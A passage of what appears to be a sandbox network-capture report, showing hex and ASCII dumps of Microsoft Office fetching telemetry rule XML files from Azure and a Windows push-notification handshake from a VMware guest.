                                                                                                                                                                                                            2024-11-21 14:17:37 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            74192.168.2.64978613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:38 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                            x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141738Z-178bfbc474bnwsh4hC1NYC2ubs00000001sg0000000001zs
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            75192.168.2.64978713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:37 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:38 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                            x-ms-request-id: c2dc1527-b01e-0053-5db2-3bcdf8000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141738Z-1777c6cb754dqf99hC1TEB5nps0000000az000000000kkpw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            76192.168.2.64978813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:38 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                            x-ms-request-id: 38a668eb-401e-00ac-34a1-3b0a97000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141738Z-r1d97b99577l6wbzhC1TEB3fwn0000000akg00000000azzv
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:38 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            77192.168.2.64978940.113.110.67443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 41 47 57 6a 56 30 4b 4a 33 55 69 76 37 62 2f 43 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 65 66 36 61 35 34 36 66 30 37 36 65 39 36 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: AGWjV0KJ3Uiv7b/C.1Context: 39ef6a546f076e96
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 41 47 57 6a 56 30 4b 4a 33 55 69 76 37 62 2f 43 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 65 66 36 61 35 34 36 66 30 37 36 65 39 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 50 30 31 76 6b 39 4e 36 51 2f 41 41 51 47 39 56 53 4a 4c 42 31 38 70 76 2f 36 4c 4e 45 32 46 39 46 78 75 31 71 41 30 4f 36 38 6b 2b 35 53 4a 76 63 42 4c 6a 65 61 66 56 69 75 2b 4b 51 44 77 6d 71 68 4e 6b 74 56 50 45 63 65 61 39 73 46 39 69 4f 6f 7a 6a 6a 77 34 4a 52 4a 43 44 39 57 70 59 50 59 74 76 79 37 4e 7a 4e 4a 73 43
                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: AGWjV0KJ3Uiv7b/C.2Context: 39ef6a546f076e96<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUP01vk9N6Q/AAQG9VSJLB18pv/6LNE2F9Fxu1qA0O68k+5SJvcBLjeafViu+KQDwmqhNktVPEcea9sF9iOozjjw4JRJCD9WpYPYtvy7NzNJsC
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 41 47 57 6a 56 30 4b 4a 33 55 69 76 37 62 2f 43 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 65 66 36 61 35 34 36 66 30 37 36 65 39 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: AGWjV0KJ3Uiv7b/C.3Context: 39ef6a546f076e96<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC58INData Raw: 4d 53 2d 43 56 3a 20 37 58 53 54 4f 33 49 31 6a 55 61 51 66 58 73 59 77 32 6e 56 36 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                            Data Ascii: MS-CV: 7XSTO3I1jUaQfXsYw2nV6Q.0Payload parsing failed.


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            78192.168.2.64979013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                            x-ms-request-id: 7a62cedf-201e-003c-3dc3-3b30f9000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141740Z-r1d97b99577hsvhhhC1TEByb1w00000004p000000000gp5u
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            79192.168.2.64979113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:39 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                            x-ms-request-id: 138215a1-101e-0017-6465-3b47c7000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141740Z-178bfbc474bvjk8shC1NYC83ns00000001d000000000fn1a
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            80192.168.2.64979313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                            x-ms-request-id: 538c9d0d-101e-0028-1c8c-3a8f64000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141740Z-r1d97b99577dd2gchC1TEBz5ys0000000a9g00000000b3av
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            81192.168.2.64979213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 14:17:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                            x-ms-request-id: 906eedcd-201e-0071-4861-3bff15000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241121T141740Z-178bfbc474bw8bwphC1NYC38b400000001gg0000000010bw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            82192.168.2.64979413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-21 14:17:40 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
